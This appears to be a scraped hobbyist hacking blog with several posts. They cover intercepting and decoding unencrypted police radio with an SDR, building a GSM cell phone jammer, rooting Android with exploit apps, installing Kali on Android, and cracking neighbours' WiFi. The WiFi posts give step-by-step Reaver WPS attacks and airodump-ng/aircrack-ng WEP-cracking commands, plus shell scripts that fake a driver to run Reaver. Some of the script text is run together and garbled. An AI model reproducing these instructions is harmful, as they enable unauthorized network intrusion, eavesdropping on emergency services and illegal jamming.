TECH GEEK

Tuesday, 30 May 2017

Building a Radio Listening Station To Decode Digital Audio & Police Dispatches

On April 7, 2017, residents in Dallas, Texas, woke to the sound of emergency sirens blaring all over the city. No one could shut them off, and after repeated efforts to contain the situation, the city had to shut down the entire system. While the media reported a sophisticated computer hack was responsible, the truth was much less high-tech.

The sirens in Dallas were controlled by a series of radio signals that weren't encrypted, and anyone could broadcast them with the right equipment. Turns out, someone simply listened in to the radio signal during a test or real emergency that triggered the sirens to go off, then played it back later. This low-tech hack managed to use the principles of signals intelligence to control a system via radio waves.

But how would someone sniff radio signals — and then use them to control or interact with a system?

Things like garage door openers, car keys, and apparently emergency sirens are controlled by radio frequencies that can be eavesdropped on, decoded, or even simply rebroadcast to trigger the same effect. In this series, we will learn to both detect and listen in on these hidden radio frequencies, then rebroadcast or transmit them — on the $35 Raspberry Pi, no less.

Getting Started with a Portable Radio Listening Station

This build will teach you to detect local radio signals outside the "normal" FM band you're used to tuning into in your car or on your commercial FM radio. We will create a portable listening station to explore the VHF (very high frequency) and UHF (ultra high frequency) spectrums and decode digital audio data to make sense of the sounds in the world around you.

This will start our series on signals intelligence (SIGINT), which is the analysis of signals to discern intelligence about a target. Of course, the first step in analyzing a signal is being able to hear it, so we'll need to dive into talking about both software-defined radio (SDR) and the radio frequency spectrum we'll be pulling the signal from.

The Radio Spectrum

Earn free bitcoin

There's an invisible conversation going around us in the radio frequency all the time. Though we can't see it, we transmit our civilization's wireless data overwhelmingly through the radio frequency spectrum.

Visible light sits on that spectrum between 430–770 THz, which is what our biological eyes can sense. But down in the sub-1 GHz range lies much of our radio communication, including FM radio and the communication that takes place between law enforcement and first responders.

Wouldn't it be great if you could peer into this spectrum and make sense of signals of your biological body isn't built to perceive?
The basics of the radio frequency spectrum.

The radio spectrum is huge, so to avoid getting lost, this guide will be quite specific. However, there is a lot to explore and this guide is only the beginning. If you're curious about the signals you're receiving, you can always reference them against this handy chart if you're in the United States. In this guide, 24 MHz to 1.7 GHz is where we'll be operating.

Gather Your Materials

To accomplish this tutorial, you'll need an SDR dongle and antenna to receive and convert the signal. You'll also need software to interpret the radio signal as well as another software to decode digital speech.

The Software-Defined Radio Receiver

SDR takes the parts of radio tuning that was normally done by crystals or local oscillators and accomplishes them with software instead. The basic requirements for such a system are a personal computer (or Raspberry Pi), a sound card or signal processor, and an RF receiver to receive the signal. As a result, many of the processes done by dedicated hardware are now done by a computer, making the entire radio system very low cost and flexible.

The team at RTL-SDR created a very cheap software-defined radio receiver that uses a DVB-T television tuner dongle based on the RTL2832U chipset, which they wrote a new software driver for to directly access the signal data. Their SDR kit gets you up and running for a mere $25.

Your other options, if you're feeling fancy, are the $169 Airspy R2 or the $149 SDRPlay. While those are certainly nice, I prefer low-cost, open-source, and commonly used tools for hacking, so we will focus on the RTL-SDR.

I used an RTL-SDR plus two adjustable antennas, but any SDR kit that can tune into around the 400–600 MHz range should do fine. This tutorial will use the RTL-SDR for selectors in our SDR radio program; You may need to modify them to get a different adapter to work.

The SDR Software

Next, we will need software to interpret the radio signal. The open-source GQRX is my tool of choice, after managing to get it working on macOS Sierra and Kali Linux. This guide will cover macOS. However, I will cover the Kali install on a Raspberry Pi another time, as it requires a lot of dependencies and needs the sound cards to be working properly. The macOS build is more straightforward.

The Digital Speech Decoder

My macOS listening post build relies on the ability to decode digital data we intercept live to listen in on conversations. To do so, we will focus on one common type of signal we hope to intercept — digital audio.

Digital audio constitutes a signal of interest because it's frequently used by police and security organizations for communication and is often not encrypted since they are encoded. This, of course, is silly since encoding can be easily broken.

In my city, police do not encrypt dispatch except for tactical channels, it's just encoded as digital audio, so we'll use DSD to break the code live and listen in to their communications. We do this by streaming the audio via UDP (User Datagram Protocol) to DSD running in a terminal window below GQRX that decodes digital audio.
Decoding some digital audio.

Someone might point out that there are websites where you can stream these kinds of signals decoded by someone with a fancy, expensive radio and streamed digitally. That's great, but the stream is from a third party provided over the internet. Source your own data. For the cost of an SDR tuner and the software to run it, you can target specific agencies in your area for data collection.

Install GQRX

GQRX, as pictured above in Kali, required a ton of dependencies. Want to compile them for hours? Me neither, so we'll install them using MacPorts. There is also a version available via Homebrew, but I was disappointed to find it didn't work properly.

First thing's first, MacPorts. Head to the MacPorts homepage and download the appropriate version, ensuring you've downloaded and installed Xcode and the Xcode Command Line Tools. Once Xcode is all ready, install MacPorts via the guided install, and you should be ready to begin installing GQRX.

Run GQRX

To ensure everything is up to date, update MacPorts by typing the following in terminal:

sudo port selfupdate

Now, the battle begins. To download and install all the dependencies for GQRX, enter:

sudo port install gqrx

You may get errors while installing, as I did. For my Mac, this took six tries. Each time I chewed through more dependencies before getting an error and having to start the command over, and each time the list of dependencies got smaller until finally, they were all installed. Eventually, your resolve will defeat the machine and you will finish installing the complete list of dependencies.

Once the install is complete, run GQRX by typing the following in a terminal:

gqrx

Decode Digital Audio with DSD

To install DSD, we will need to install Homebrew since, of course, it's not available in MacPorts. Thanks to Hugh Dev, there is a nicely documented way to install a speech decoder via Homebrew.

To install Homebrew, run the following in terminal (ignore the giant spaces if you see them, they're just once space each):

ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

Once this is complete, we can install DSD. Run the following commands in terminal to install DSD:

brew install git cmake libsndfile itpp portaudio
brew install --HEAD mbelib

git clone https://github.com/szechyjs/dsd.git

cd dsd & mkdir build && cd build

cmake ..

make

sudo make install

Run "dsd -a" to see a list of available audio sources. We'll need this later to connect the audio from our receiver too. In this case, it's pretty straightforward.

Configure GQRX with the RTL-SDR

If you try to start capture in GQRX with the wrong settings enabled, it will likely crash. Click on the hardware configuration tab (the green chip icon next to the "play" symbol on the top left of the screen) and enter the configuration to match the following configuration.

I/Q input:

    Device: Other...
    Device string: rtl=0
    Input rate: 1800000
    Decimation: None
    Sample rate: 1.800 Msps
    Bandwidth: 2.700000 MHz
    LNB LO: 0.000000 MHz

Audio output:

Device: Built-in Output
Sample rate: 48 kHz

Once your configuration matches mine, click okay and then plug in your RLT-SDR with antenna deployed. Due to something I did, I'll remind you to turn down your audio, take out any headphones, and turn down the gain.

Next, click the play button to start the capture.

Capture Unencoded Audio from Our Listening Station

If everything went well, we have the entire spectrum the RTL-SDR can tune into at our disposal. For practice, tune to a channel between 88 and 102 MHz, the standard range for FM radio. Set the "mode" to FM mono (or stereo depending on which sounds better), and click on a strong signal you can see in that range. You should hear audio play. You're tuning into public broadcasts. Explore up and down the frequency to start finding other unencoded broadcasts, using the guide above to understand the signals you find.

Find Encoded Audio to Decode

Look up what frequencies emergency services in your area use and navigate to that set of frequencies. If you live in a city like I do, this should be lit up with transmissions that look like "waterfalls" of data rather than waveforms of FM transmissions. In these frequencies, you may find unencoded dispatch frequencies and private security company two-way radio communication as well, but you must switch modes to hear it.

Switch "mode" to narrow FM and try tuning into an unencoded audio stream if one is available. If one is not, target a waterfall that looks like the one in the picture below. Select the "UDP" option in the audio window as shown below in blue to output our audio to DSD.

Look for streams that turn on and off. Always-on streams are usually trunk relay units or other logistics-related data transmissions that aren't human voices we can decode. Once you find a promising one, let's try decoding it.

With the station locked on and UDP selected, run the following in terminal to check if the output is working.

nc -u -l localhost 7355

If so, run the following to begin decoding digital speech, with pa:1 the number of the output device we found before.

nc -l -u localhost 7355 | dsd -i - -o pa:1

As packets are received from the air, they will show up in DSD.
Successful intercept of digital audio from emergency services.

The packets in the photo above are indicative of a digital voice transmission being intercepted and decoded live.

Squeeze Speech Out of a Bad Signal

Some signals won't yield voice because they are encrypted (rather than encoded) or require some tweaking to lock on to. Try narrowing or expanding the filter, adjusting the gain or squelch, or going up or down the spectrum to get a voice stream to begin flowing through DSD. Be creative in your antenna placement and note differences in reception in response to things you do or places you put it.

This build gives you the ability to scan normally invisible spectrums and begin to listen in on those who may think they are communicating in private. While decoding radio broadcasts is legal in the US, things get interesting when we go up to cellular phone and Wi-Fi transmissions.

Make sure to check out my follow-up guide, where I go over broadcasting signals from a Raspberry Pi in the radio spectrum by simply adding a piece of wire.

Thanks for reading, and make sure to keep an eye on my blog for more hacking tutorials. You can ask me questions here or @joelvaiju on instagram.

Wednesday, 18 January 2017

Build a Home Made Cell Phone jammer

Technical details:

Many cell phones use GSM800 mobile standard to operate, thus my VCO (sweeping oscillator) is tuned to the 800MHz frequency range. It may be quite difficult to make this one to work properly without some skills and good testing tools, but in result you will have the efficient VCO.

I used clock oscillator for 45MHz as the noise generator for this jammer. It drives the local oscillator port which is located at the mixer. The signal is going out from the local oscillator and passes through the impedance matching network along its way. This helps equate the impedance of 45MHz clock oscillator with the impedance of the mixer's port.

This port acts like RF input of the signal jammer. The RF output signal passes through the amplifier on the mini-circuit. The output power is increased by additional 15-16dbm in this way. Then the output signal goes to the RF output antenna. RF input has the antenna too.

Jammer operating:

Why I chose 45MHz clock oscillator? Because GSM800 band transmitted and received signals are always separated by the exact number of frequency and it is that 45MHz. Now picture this: cell phone user dial someone and signal goes off. RF input antenna catches it and jammer modifies this signal and lets it go. This signal have a frequency of cell phone's received signal, so cell phone user would hear his or her own voice in a phone! :)

              I should also mention that this particular cell phone jammer might be used to block the signal of the cell-based car tracking device which records your GPS data and sends it to some bad guys. And it probably can even jam some IED signals if they are controlled by cell phone GSM800 band.

           But I hope that there be no situation in this life when that feature will be needed by me, or you, or anyone else.

Monday, 10 October 2016

Benefits Of Rooting Android Devices And How To Root Without Computer

Tool root or not to root? It's a question that most people don’t ever ask themselves, because Android devices are powerful and customizable from the get-go, and rooting can be risky.But it’s not that risky.

And if you want to really unlock the full potential of your device—if you want to be able to control everything, backup everything, customize everything, and do all sorts of fun things like install custom ROMs and get Android Lollipop ahead of the pack—you’ll need to root your phone.

I’m not saying you have to root your Android device… but I am saying you might be a goody two-shoes if you don’t.

Benefits of Rooting Android Devices

Automate everything

Powerful root-only apps like Tasker can turn your dream of a super-smartphone into a reality. Tasker uses the “if this, then that” mentality to make your phone a genius — for example, you can use Tasker to automatically silence your phone at night, turn on your Wi-Fi when you’re at home, or open up an app when you connect to your car’s Bluetooth.

Lollipop, here I come!

Android phone makers have a habit of not releasing updates in a timely manner. Or at all, sometimes. So why are you still waiting for the latest OS when you could simply root your phone and get it right now? Patience is for people who don't know how to root.

Faster than the speed of… your CPU

Contrary to what the phone-makers want you to believe, your Android device could definitely be faster. And you can take speed matters into your own hands with apps like SetCPU, which is only available after you root. What’s a little battery life lost when you have more power?

Better battery life

You know how you can overclock your device’s CPU for ultra-speedy app-switching (who doesn’t want to multitask like Sonic the Hedgehog)? Well you can also use SetCPU to underclock, or slow down, your CPU for when you need that extra 29 minutes of battery life.

Bye-bye, bloatware

Nuking factory-installed bloatware beats disabling it any day.

Really, really back up your stuff

OK, so Google does a pretty good job of keeping your mail, contacts, calendar, apps, and other Google-y things in order. But if you want to truly backup everything, as in, ifyou want to take a literal snapshot of your device and stick it somewhere safe, you’ll need the root-only Titanium Backup. Satisfy your hoarding tendencies!

Customize all the things!

Android is pretty customizable, even without rooting your phone. But with a root you can literally customize everything. Vibration strength? Precise screen color calibration? Gesture control? There’s a (root-only) appforthat.

Store apps wherever the hell you want to

Use a root-only app like Folder Mount to store apps, not just files, on your microSD card. Now your device has infinite (read: 128GB) of real usable storage!

Rooting your Android Device gives you Super User access for your mobile by rooting your android device even you can uninstall built-in apps, now i am going to show you 2 easy ways to root your android device easily without computer.

Method 1:(Framaroot)

Framaroot is android app it can easily root your android device now its not available in play store so click here to download the app and install it.

After installing open the app and choose Install Supersu from dropdown menu show above.

It show number of exploit methods to root your android device choose anyone of the method my first preference is Boromir if it fails try other exploit methods.

Within seconds it show the result after that you need to restart your device to install Supersu which manage root accessand you need net connection to download it.

UnRoot

If you need to unroot your android device simply select Unroot option from the drop down menuof framaroot give below.

This method help to root and unroot your android device in easy way it mostly works for most of the android device if it notworks follow the method 2.

Method 2:(Kingroot)

Kingroot app gives you toone touch root access, Click here to download the app.Install and open the Kingroot app.

Install and open the Kingroot app.

Tap the START ROOT option to root your android device the rootingprocess is like given below.

After rooting you will get the confirmation screen like given below.

Now your android device is rooted enjoy the superuser access on your android……….

How to Install Kali Linux on Android – Tutorial

Hacking with Kali Linux, hacking becomes much easier since you have all the tools (more than 300 pre-installed tools) you are probably ever gonna need. Others can be downloaded easily.

In my previous article i am explained about Introduction To Hacker’s OS: Kali Linux And Setup Tutorial for PC, but in this article i have a great idea to setup Kali Linux on Android devices, it will help you to turn your android device into a hacking tool with the greatest Hacker’s OS Kali Linux.

This tutorial helps you to run any GNU/Linux in yourandoid device here am going to show the easy way to install Kali Linux in android phone and kali linux is the best hacking software ever.

Installing Kali Linux in Android phone is very veryeasy one you need the following requirements.

1. Rooted Android Device.(Refer Here)

2. Busybox Installer.(Download)

3. Linux Deploy.(Download)

4. Android VNC Viewer.(Download)

5. 4GB Free Space on your External Memory.

6. High Speed Net Connection.

STEP 1:(Rooting Android Device)
Root your android device with the given tutorial.

STEP 2:(Installing Busybox)
First we need to install UNIX Scripts into our device using the Busybox Installer app. Download the app from above given link and install it in your tablet linux. Open the app and follow the given steps.

1.Choose the Busybox Version from the drop down menu.

2.Tap the install buttom.

3.It will download the scripts to be install.

4.After installing you will get the success message.

Now you have successfully installed busybox in your android device.

Note: If the installing fails you need to choose different Busybox versions.

Also read: how to hack WiFi using android

STEP 3:(Configure Linux Deploy)

Linux Deploy is the Officialapp to Download and install kali linux in android download the app and install it in your android. Now open the app and follow the given steps.

1.Tap the properties icon it will opens the propertiesscreen.

2. In properties select the distribution to be install.

3. Leave some setting to be default and select the desktop environment to GNOME.

4.Select all the components in Components Menu.

5. In GUI Settings just interchange the height and width values.

6. Now select the install button and then OK.

7. Now the installation process starts be patient for the installation proccess to complete it takes too much of time to complete and prevent the incoming SMS and Voice Calls or Turn off the SIM and use WIFI to download because intreption of cellular data leads to cancellation of download process.

Also read: how to hack WiFi using android without bcmon

8.Now tap the START button and tap OK it will mount the linux file.

9. Note the IP address in the top left corner of Linux deploy it changes periodically.

Sunday, 9 October 2016

An Introduction To Hacker’s OS: Kali Linux Setup Tutorial

We have had innumerable discussions on computer security till today. This article brings to you one of the biggest and the most important tools that every penetration tester or a hacker uses.

Today we are going to introduce you to Kali Linux, a Linux Distribution, which is more of a branch of Debian, but with several specialties. If you have heard of BackTrack, then Kali should be introduced to you more as an updated version of the former. “From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created” that is how Offensive Security Ltd. defines their project. Kali Linuxis an operating system specially designed for penetration testing and security auditing. It is an open source software, stuffed with numerous penetration testing tools, discussing and naming all of which is next to impossible, as it has over 300 of them. This blog puts forward my efforts to introduce the readers to the basics of Kali, which will help them get a head start with this OS. Besides the basic utility tools and applications present in every OS distribution, Kali is preinstalled with the best programs and security tools like Hydra (login cracker), Nmap (port analyzer), Wireshark (data packet analyzer), John the Ripper (password cracking tool) and Metasploit Framework (exploit code developing tool), and other tools put together under the category of “Top 10 Security Tools” under the “applications” tab. Initially theymight sound Hebrew, but it isn’t that difficult to get a goodhold on these tools once you start exploring them.

Latest Version of Kali Linux has released:

Kali also has other tools categorized separately for:
*.Information Gathering

DNS analysis tools

Network Scanners

Traffic Analyzers

*.Vulnerability Analysis

Cisco Tools

Database Management tools

Open Source Assessment tools

*.Web Applications

CMS Identification tools

Database Exploitation tools

Web Vulnerability Scanners

*.Password Attacks

Offline Attack toolsOnline Attack tools

*.Wireless Attacks

Bluetooth tools

Wireless tools

NFC/RFID tools

*.Exploitation Tools

BeEF XSS Framework

Social Engineering tools

Network Exploitation tools

*.Sniffing and Spoofing

Network and Web Sniffers

Network Spoofing toolsVoice and Surveillance tools

*.Maintaining Access

Backdoors

Tunneling tools

*.Reverse Engineering

Debuggers

Misc RE Tools

*.Stress Testing

Network Stress Testing tools

WLAN Stress Testing tools

*.Hardware Hacking

Android Tools

Arduino Tools

*.Forensics

Anti-Virus Forensics tools

Forensic Analysis tools

*.Reporting Tools

Besides these, Kali has numerous other tools too which are among the best security and penetration testing tools ever found. Kali Linux, being a free and open source software, is easily obtainable, and is used by bothamateurs as well as professionals. Professionals use it for analyzing vulnerabilities in information systems and networks, for forensic analysis, for finding security exploits, and for applications testing. On peeping into the hackers’ den, Kali can be utilized in breaking security codes, cracking passwords, hacking into Wi-Fi networks, brute force password attacks, network sniffing, IP spoofing and other malicious ventures. However, learners and amateurs can learn a lot from this OS. This distribution probably has enough tools to last for a penetration tester’s lifetime. Therefore a hands-on experience will not only enable a beginner to know new things,but also introduce him to the cutting edge technologies usedby the pen testers and crackers. If you are consideringa career in information security, then Kali Linux is the best option for you to go for, and start your journey with.

One can install Kali Linux in the hard drive, or run from a Live CD, or a Live USB. Kali is also available for ARM devices like Chromebook, Galaxy Note 10.1 etc.

How to hack wifi using android

It is one of the most searched query on the Internet -How to hack WiFi Using Android Mobile?Is it possible to hack WiFi using Android? Well, kernel the answer is yes. Android is an operating system based on Linux kernel,so almost all such hacks and tricks are possible. But since an android device is not as powerful as a normal PC,there are certain conditions and requirements to be satisfied in order to hack WiFi with it. There are hundreds of fake apps and malware which claims to hack WiFi in seconds,remember there are no such 'one click WiFi Hacking apps'. In Simple words,not every Android device can hack WiFi andalso it may take hours or days for a successful hack.

How to Hack WiFi Using Android?

Proceed only if your device falls under either of the below category. Otherwise it is waste of time and energy. For better results useCyanogen ROM.

1.Android Device should be rooted.

2.Android Device should support bcmon App(i.eshould haveBroadcom bcm4329/4330wifi chipset. [OR]

3.[Update] Now 'nonbcmonsupported devices'& 'devices which support external WiFi cards' can also be used to hack WiFi. Check this post How To Hack Wifi Using Android Without bcmon

Tools Used:

*.bcmon app[apk] -This tool enables Monitor Modeon your rooted device with Broadcom chipset, which is essential for hacking WiFi using android. Download

*.Reaverfor Android or RfA - A WiFi pentestingtool which can be used to attack WPS-enabled routers and after the WPS-Pin is cracked, it can retrieves the actual WPA-key. Download

Hacking WPA/WPA2 (WPS Enabled) WiFi using Android [bcmon supported devices]

*.Download and installbcmon app.
*.Run bcmon. It may crash at first but keep trying. If it still crashes after 3-4 attempts the device may not be supported.
*.Install the firmware and tools,as prompted. Click on 'enable monitor mode'.
*.Download and installreaverand run it.

*.Reaver will scan for available access point. Remember it can hack only WPS enabled WiFi. Make sure Monitor Mode' is turned on. Make sure that the "Automatic advanced settings" box is checked.

*.Choose the network to hack and tap "Start Attack". It will take between 2-10 hours to hack. And sometimes it will never e successful depending on the router type.

Hacking WEP type WiFi Using Android Phone

WEP is an outdated,extremely weak protocol to secure WiFi and it is no more preferred because it can be hacked within seconds. However due to lack of awareness it is still used across the world. Below instructions explain how you can use you android device to hack a WEP protected WiFi network.

Procedure

*.bcmon app is used here also. So download and install it as told above
*.Tap "Run bcmon terminal". This will launch a terminal similar to most Linux terminals.
*.Typeairodump-ngand tap the Enter button. Inthe newly opened window type airodump-ng wlan0 and tap the Enter button.

*.Open reaver and note down the WiFi (Access point) name,Mac Address and the broadcasting channel of the WiFi which you want to hack. Make sure it is WEP.
*.Now we can start scanning the target WiFi andcollect packets. Type the following

*.airodump-ng -c channel# --bssid MAC address -w outputfile ath0

*.Note:channel# = broadcasting channel,MAC address = Mac Address of the routerwhich you already noted down.-wis for specifying the output file name. I have given outputfileinthe example. So the complete command look similar to this.

*.airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w outputfile ath0

*.Continue scanning untill it collects 20,000-30,000 packets.
*.Once enough packets are collected return to the terminal and type aircrack-ng outputfile*.cap and tap Enter. Aircrack program will attempt to crack the WiFi password from the extracted packets.

*.It might take hours to crack. Finally a messageKey Found!will appear, followed by the key in hexadecimal form. Key will work only ifProbability" is 100%.

*.Remove":"from the key. i.e if it is19:04:56:77:94, the key would be1904567794

Credits: XDA

How To Hack WiFi Using Android Without Bcmon [Non bcmon Supported Devices]

Hi All, Thanks for dropping by. Today I am going totell you how to hack WiFi using your Android device. This is the second part of my WiFi hacking tutorial, How To Hack WiFi Using Android First part had a limitation that it works only for those devices which support bcmon app (devices withBroadcom bcm4329/bcm4330 WiFi chipsets.) In this post, I will explain how you can hack WiFi with any Android device.

How to Hack WiFi using Android without bcmon.

Following the instructions carefully will help you to hack WiFi using any Android device without bcmon or Broadcom chipsets. Make sure the following requirements are met before proceeding.

Requirements:

*.Rooted Android Device.
*.Some apks must be installed. Make sure you allow installation of apps from 'Unknown sources' in the security settings.
*.Supported OTG WiFi Adapter, for best results.
*.A few scripts which is shared below.
*.WPS Enabled WiFi (WPA/WPA2) in a close range

Instructions To Hack WiFi using Android Without bcmon supported Devices.

We still need to install bcmon app though it is probably not supported by your device. The idea is to create a folder of bcmon in the system folder and with some tweaks, make Reaver believe that the device is bcmon supported. Go ahead and follow the below given instructions.

*.Download Reaver [apk](RFA) and install it*.Install Root Explorer from PlayStore. Alternatively you can use ES File Explorer also.

*.Download bcmon (Don't worry if your device is supported or not)

*.Install and open bcmon app

*.Leave it open for a few seconds and then go tohome.(This step is to create a foldercom.bcmon.bcmon in/Data/data)

*.Open root explorer or ESFE and browse to the bcmon apk previously downloaded.

*.Select it and press view or select it and choosethe option 'extract'.

*.Open the assets from the extracted folder

*.Copy all the files to/Data/data/com.bcmon.bcmon/files.

*.Replace/Delete any folder or file if it is alreadythere.

Using Custom Scripts To Activate Monitor Mode.

Since the device is not bcmon supported, we need to ensure RfA is less dependent on bcmon. This is for better results. We will use custom monitor-mode-activation scripts. Copy the below codes in a note editor and save with a .sh extension to somewhere you can remember easily. You can use ES File Explorer for this.

start.sh (enables monitor mode and exits)

#!/bin/bashsvc wifi disableLD_LIBRARY_PATH=/data/data/com.bcmon.b cmon/files /libsLD_PRELOAD=/data/data/com.bcmon.bcmon/ files/libs/libfake_driver.so shcd /data/data/com.bcmon.bcmon/files/tools. /enable_bcmonecho "rfasuccess"exit

warm.sh

RfA will read the script and execute the commands internally. This is needed to execute reaver in the same terminal session as the script.

#!/bin/bashLD_LIBRARY_PATH=/data/data /com.bcmon.bcmon/files/libsLD_PRELOAD=/data/ data/com.bcmon.bcmon/files/libs /libfake_driver.so shcd /data/data/com.bcmon.bcmon/files/tools

stop.sh (disables monitor mode)

#!/bin/bashsvc wifi enableecho "rfasuccess"

*.Now openroot explorer.
*.Navigate tobcmon.bcmon/files/tools/reaver
*.Long press,chose permissions and then check theexecuteboxes(all 3) & click OK.
*.Go to tools, long press enable_bcmon and grant itexecuterights (all 3) & click OK .

Step By Step instructions to hack WiFi using Android

Now you have set up the scripts and required apps, we can move to the next steps. Follow the instructions correctly. This part specifically deals with Reaver App.

*.Open Reaver app & scan for networks
*.Select any one in green color and which is in good range. For quick cracking & better resultsuse OTG supported external WiFi adapter (If your device supports it)

*.Go to settings and open monitor-mode settings. Uncheck 'use bcmon' and click 'Browse' to load all the scripts.
*.start.shis the activation script,warm.shis the warm up script andstop.shis the stop script.
*.Check the debugging mode option.

*.Now go back to the attack screen and press testmonitor-mode. Grant root permission if any popup comes. Press OK and press start attack.

*.Rest of the steps are pretty much same as the previous tutorial.
*.Wait until the WiFi password is cracked and displayed by Reaver.

That's all. Good luck hacking WiFi. I am not responsible for any damages caused to your device. Unauthorized attempts to hack WiFi is a criminal offence punishable by law. Try it at your own risk.